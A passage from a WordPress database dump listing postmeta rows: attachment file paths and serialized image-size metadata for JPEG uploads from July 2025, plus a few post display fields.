(2028,635,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1088;s:6:\"height\";i:1108;s:4:\"file\";s:23:\"2025/07/S__28565533.jpg\";s:8:\"filesize\";i:295586;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"S__28565533-295x300.jpg\";s:5:\"width\";i:295;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25042;}s:5:\"large\";a:5:{s:4:\"file\";s:25:\"S__28565533-1006x1024.jpg\";s:5:\"width\";i:1006;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:168688;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"S__28565533-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8302;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"S__28565533-768x782.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:782;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:112286;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:23:\"S__28565533-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18820;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2029,636,'_wp_attached_file','2025/07/S__28565532.jpg'),
(2030,636,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1476;s:6:\"height\";i:1108;s:4:\"file\";s:23:\"2025/07/S__28565532.jpg\";s:8:\"filesize\";i:340444;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"S__28565532-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20722;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"S__28565532-1024x769.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:769;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:131472;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"S__28565532-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8228;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"S__28565532-768x577.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:86064;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:23:\"S__28565532-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19981;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2031,637,'_wp_attached_file','2025/07/S__28565536.jpg'),
(2032,637,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:23:\"2025/07/S__28565536.jpg\";s:8:\"filesize\";i:390475;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"S__28565536-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20844;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"S__28565536-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:143977;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"S__28565536-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8367;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"S__28565536-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:92635;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:23:\"S__28565536-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19602;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2033,638,'_wp_attached_file','2025/07/S__28565534.jpg'),
(2034,638,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1295;s:6:\"height\";i:1108;s:4:\"file\";s:23:\"2025/07/S__28565534.jpg\";s:8:\"filesize\";i:334224;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"S__28565534-300x257.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:257;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23704;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"S__28565534-1024x876.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:876;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:155524;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"S__28565534-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8815;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"S__28565534-768x657.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:657;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:101808;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:23:\"S__28565534-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19381;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2035,639,'_wp_attached_file','2025/07/S__28565535.jpg'),
(2036,639,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:23:\"2025/07/S__28565535.jpg\";s:8:\"filesize\";i:429815;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"S__28565535-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20323;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"S__28565535-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:152487;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"S__28565535-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8099;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"S__28565535-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:96327;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:23:\"S__28565535-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18200;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2037,640,'_wp_attached_file','2025/07/S__28565537_0.jpg'),
(2038,640,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:25:\"2025/07/S__28565537_0.jpg\";s:8:\"filesize\";i:361473;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__28565537_0-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22286;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__28565537_0-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:139489;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__28565537_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9201;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__28565537_0-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:91761;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__28565537_0-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20743;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2039,641,'_wp_attached_file','2025/07/S__28565539_0.jpg'),
(2040,641,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:25:\"2025/07/S__28565539_0.jpg\";s:8:\"filesize\";i:354871;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__28565539_0-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22743;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__28565539_0-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:139249;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__28565539_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9242;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__28565539_0-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:91959;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__28565539_0-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21157;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2041,642,'_wp_attached_file','2025/07/S__28565540_0.jpg'),
(2042,642,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:25:\"2025/07/S__28565540_0.jpg\";s:8:\"filesize\";i:285248;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__28565540_0-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20475;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__28565540_0-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:114834;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__28565540_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8741;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__28565540_0-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:77449;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__28565540_0-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18735;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2043,643,'_wp_attached_file','2025/07/S__28565541.jpg'),
(2044,643,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:23:\"2025/07/S__28565541.jpg\";s:8:\"filesize\";i:446031;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"S__28565541-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23091;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"S__28565541-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:160712;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"S__28565541-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8967;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"S__28565541-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:102469;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:23:\"S__28565541-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22151;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2045,644,'_wp_attached_file','2025/07/S__28565542.jpg'),
(2046,644,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1303;s:6:\"height\";i:1108;s:4:\"file\";s:23:\"2025/07/S__28565542.jpg\";s:8:\"filesize\";i:406937;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"S__28565542-300x255.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:255;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26649;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"S__28565542-1024x871.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:871;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:180512;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"S__28565542-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9832;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"S__28565542-768x653.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:653;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:117392;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:23:\"S__28565542-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21727;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2047,645,'_wp_attached_file','2025/07/S__28565543.jpg'),
(2048,645,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:23:\"2025/07/S__28565543.jpg\";s:8:\"filesize\";i:266315;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"S__28565543-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15270;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"S__28565543-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:96262;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"S__28565543-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6298;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"S__28565543-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:62138;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:23:\"S__28565543-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13394;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2049,646,'_wp_attached_file','2025/07/S__28565546.jpg'),
(2050,646,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:23:\"2025/07/S__28565546.jpg\";s:8:\"filesize\";i:303617;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"S__28565546-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18286;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"S__28565546-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:112350;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"S__28565546-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7477;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"S__28565546-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:73673;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:23:\"S__28565546-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16208;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2051,647,'_wp_attached_file','2025/07/สีม่วง-สีชมพู-สีครีมโมเดิร์น-เรียบง่าย-ทาง.jpg'),
(2052,647,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1414;s:6:\"height\";i:2000;s:4:\"file\";s:130:\"2025/07/สีม่วง-สีชมพู-สีครีมโมเดิร์น-เรียบง่าย-ทาง.jpg\";s:8:\"filesize\";i:495252;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:130:\"สีม่วง-สีชมพู-สีครีมโมเดิร์น-เรียบง่าย-ทาง-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23827;}s:5:\"large\";a:5:{s:4:\"file\";s:131:\"สีม่วง-สีชมพู-สีครีมโมเดิร์น-เรียบง่าย-ทาง-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:178308;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:130:\"สีม่วง-สีชมพู-สีครีมโมเดิร์น-เรียบง่าย-ทาง-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10043;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:131:\"สีม่วง-สีชมพู-สีครีมโมเดิร์น-เรียบง่าย-ทาง-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:193389;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:132:\"สีม่วง-สีชมพู-สีครีมโมเดิร์น-เรียบง่าย-ทาง-1086x1536.jpg\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:324393;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:130:\"สีม่วง-สีชมพู-สีครีมโมเดิร์น-เรียบง่าย-ทาง-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23553;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2055,625,'_thumbnail_id','626'),
(2056,625,'_edit_last','1'),
(2059,625,'title_style','default'),
(2060,625,'_title_style','field_5d1a0217cf408'),
(2061,625,'related',''),
(2062,625,'_related','field_603b51c3e183e'),
(2063,648,'title_style','default'),
(2064,648,'_title_style','field_5d1a0217cf408'),
(2065,648,'related',''),
(2066,648,'_related','field_603b51c3e183e'),
(2069,649,'_edit_lock','1752468645:1'),
(2070,650,'_wp_attached_file','2025/07/516889811_122236778258202781_3453033589191824999_n.jpg'),
(2071,650,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:870;s:6:\"height\";i:614;s:4:\"file\";s:62:\"2025/07/516889811_122236778258202781_3453033589191824999_n.jpg\";s:8:\"filesize\";i:79875;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"516889811_122236778258202781_3453033589191824999_n-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18603;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"516889811_122236778258202781_3453033589191824999_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8029;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"516889811_122236778258202781_3453033589191824999_n-768x542.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:542;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:82372;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"516889811_122236778258202781_3453033589191824999_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20232;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2072,651,'_wp_attached_file','2025/07/517253900_122236779104202781_4324879715934509579_n.jpg'),
(2073,651,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1170;s:6:\"height\";i:814;s:4:\"file\";s:62:\"2025/07/517253900_122236779104202781_4324879715934509579_n.jpg\";s:8:\"filesize\";i:188848;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"517253900_122236779104202781_4324879715934509579_n-300x209.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:209;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18647;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"517253900_122236779104202781_4324879715934509579_n-1024x712.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:712;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:146367;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"517253900_122236779104202781_4324879715934509579_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8046;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"51725390